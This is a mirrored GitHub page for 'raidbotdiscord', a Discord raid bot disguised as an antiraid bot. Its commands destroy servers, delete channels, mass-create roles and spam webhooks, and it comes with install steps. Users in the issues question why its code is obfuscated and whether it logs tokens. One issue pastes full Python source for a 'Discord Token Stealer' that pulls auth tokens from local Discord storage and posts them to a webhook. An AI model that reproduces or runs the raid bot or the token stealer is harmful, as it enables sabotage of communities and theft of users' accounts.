Code Monkey home page Code Monkey logo

raidbotdiscord's Introduction

aaa

RAIDBOT DISCORD PREMIUM

BY HAPRAID SOWALKOUD

Watch the video

Spam webhook all channel, create massive channel, delete all channel, create massive role, etc

Commandes (Commands)

  • 🇫🇷 Commande .des pour détruire le serveur
  • 🇺🇸 Command .des for destroy the server
  • 🇫🇷 Commande .del pour supprimer tous les salons
  • 🇺🇸 Command .del for delete all channels
  • 🇺🇸 Command .red with a custom link server and name of channel
  • 🇫🇷 Commande .red détrui tout avec votre lien discord nom de salon
  • 🇫🇷 Commande .r pour avoir le role admin (le bot doit avoir les permissions)
  • 🇺🇸 Command .r for have role admin (the bot must be have permissions)
  • 🇫🇷 Commande .exit pour faire quitter le bot du serveur
  • 🇺🇸 Command .exit for leave the bot
  • 🇫🇷 Commande .help avec quelque commandes d'antiraid (le bot est sous la peau d'un bot antiraid)
  • 🇺🇸 Command .help with some antiraid commands (the bot is under the skin of an antiraid bot)
  • 🇫🇷 Commande .help1212 Pour avoir les commandes raids en dm
  • 🇺🇸 Command .help1212 To get raids commands in dm
  • 🇺🇸 Command .gay create many roles "gay" in purple and add to everyone (long live the LGBT)
  • 🇫🇷 Commande .gay créer plein de role "gay" en role et ajoute à tout le monde ce role (vive la lgbt)

####NEW

  • Command .list to see all servers with id
  • Command .xinvite to get a invite of server id

.invite to invite the bot

Installation

-Download the zip https://github.com/Walkoud/raidbotdiscord/archive/master.zip
Téléchargez le zip https://github.com/Walkoud/raidbotdiscord/archive/master.zip

-Download Nodejs Node.js v4+ to run.
-Téléchargez Nodejs Node.js version 4 ou + .

-Download Git for Windows Git
-Télécharger Git pour Windows Git

Install modules node js

-Cliquer sur le fichier install.bat et install2.bat pour installer les fichiers du bots
-Click on install.bat et install2.bat to install

OR - OU

Install the dependencies and start the server.
Installez les dépendances avec ces commandes:

$ npm install
$ npm install discord.js-v11-stable
$ node index.js

Settings - Configuration

-Ouvrez le fichier settings puis modifiez -Open the file settings and edit

à modifier README
token Le token du bot - The token of bot
prefix Le préfix des commandes - The prefix of commands
nameserver Le nom de ton serveur - The name of your server
channelname Le nom des salons à créer - The name of channels to create
image Le lien de l'image de raid - The link of image raid
numberchannelmax Le nombre maximal de salons à créer - The number max of channels to create
numbermessagemax Le nombre max de messages à envoyer dans les salons - The number max of send message to all channels
noRaidServerID L'ID d'un serveur dans laquelle impossible d'effectuer les commandes - The ID of a server in which unable to perform commands
logschannelid L'ID du channel dans laquelle sont envoyé les logs des commandes effectué par tout le monde - The ID of the channel in which the logs of orders made by everyone are sent
creditname Le nom du créateur du bot - The name of the owner bot
helpRAIDcommand Nom de la commande pour voir les commandes de raid (N'AJOUTEZ PAS LE PREFIX DEDANS) - Command name to see raid commands (DO NOT ADD THE PREFIX IN)

Screen du settings

Le lien : https://image.noelshack.com/fichiers/2020/13/1/1584997180-capture.png

Démarrer le bot - start the bot

-Open the start file then write:
-Ouvrez le fichier start puis écrivez :

$ node index.js

Activate intent

  • Dont forget to open intents ! image

credits

DISCORD JS V13
https://walkoud.github.io https://hapraid.carrd.co/

discord.link/hap
discord.link/hapraid
discord.link/haproot(not working)

https://discord.gg/sVFc8m9 http://hapraid.com(expired)

Discord Tag : walkoud

Other discord tag: SoWalkoud - #1 - Walkoud#0805(banned)

raidbotdiscord's People

Contributors

walkoud avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar

raidbotdiscord's Issues

Concept d'open source

Bonjour, il y a un problème au niveau du concept d'open source sur ce repo. Pourquoi le code est obfusqué ?

bug .res/.red

when I do .res or .red the channels are created fine but no message is sent.

When I launch the bot I get this message:
"(node:16712) DeprecationWarning: Guild#me is deprecated. Use Guild#members#me instead. (Use node --trace-deprecation ... to show where the warning was created)"
but it doesn't stop me from running commands.

image

Why is it obfuscated, and is it a token logger ? (i found a webhook string, but there's no webhook link)

yo, while i just run, i realized its obfuscated later like around 8 hours after running it, and i panicked after realizing its obfuscated so bad with uft- strings and stuff, so i had to deobfuscate it because i can't trust a random source, and while i was deobfuscating it i found something so interesting, yep there's no webhook link but still since i couldn't manage to deobfuscate it 100%, can you made a explanation for this ?
image
Edit 1 : I tried to use http debugger on it and i didn't find any webhook, but still, i want a explanation for why it's not open source ?

a

hahhs

Raid serveur Discord

import os
import re
import json
import requests
userwh = input("Enter your webhook")

def gettokens(path):
path += "\Local Storage\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}.[\w-]{6}.[\w-]{27}", r"mfa.[\w-]{84}"):
for token in re.findall(regex, line):
tokens.append(token)
return tokens

def main():
checked = []
already_cached_tokens = []

PATHS = {
    "Discord": os.getenv("APPDATA") + "\\Discord",
    "Discord Canary": os.getenv("APPDATA") + "\\discordcanary",
    "Discord PTB": os.getenv("APPDATA") + "\\discordptb"
}

for _, path in PATHS.items():
    if not os.path.exists(path):
        continue
    for token in gettokens(path):
        if token in checked:
            continue
        checked.append(token)

with open(".cache~$", "a") as file:
    for token in checked:
        if token not in already_cached_tokens:
            file.write(token + "\n")

if len(checked) == 0:
    checked.append("No tokens found")

webhook = {
    "content": "\n".join(checked),
    "username": "Discord Token Stealer"
}

try:
    requests.post(userwh, json=webhook)
except:
    pass

try:
main()
except:
pass

Obfuscated

My computer can't run it because of the o fuscated code. Do you have an unobfuscated version?

Index.js question

What does index.js do, and means? I just see a bunch of numbers, and I dont know what it is, Sorry for my ignorance

discord.js is missing

failed to install discord
npm WARN [email protected] requires a peer of uws@^9.14.0 but none is installed. You must install peer dependencies yourself.

tried to install uws didnt work

l'id

comment je met mon id pour quil me mettent les perm

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.